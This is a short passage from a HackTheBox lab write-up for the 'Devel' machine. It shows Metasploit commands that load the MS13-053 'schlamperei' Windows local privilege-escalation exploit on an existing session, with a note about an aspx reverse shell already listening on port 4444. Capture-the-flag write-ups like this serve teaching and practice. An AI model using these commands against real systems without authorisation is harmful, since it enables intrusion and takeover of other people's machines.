jakobgoerke/hackthebox-machine-writeups/Devel/Readme.md

 Lets get ready to rumble!!!

 Select our exploit and set its options
+**_NOTE_**: we need to change the port from 4444 to 4443 This is because our primary exploit(the dotaplayer.aspx reverse shell) is connected on port 4444
 ```{r, engine='bash', count_lines}
 msf post(local_exploit_suggester) > use exploit/windows/local/ms13_053_schlamperei
 msf exploit(ms13_053_schlamperei) > set SESSION 1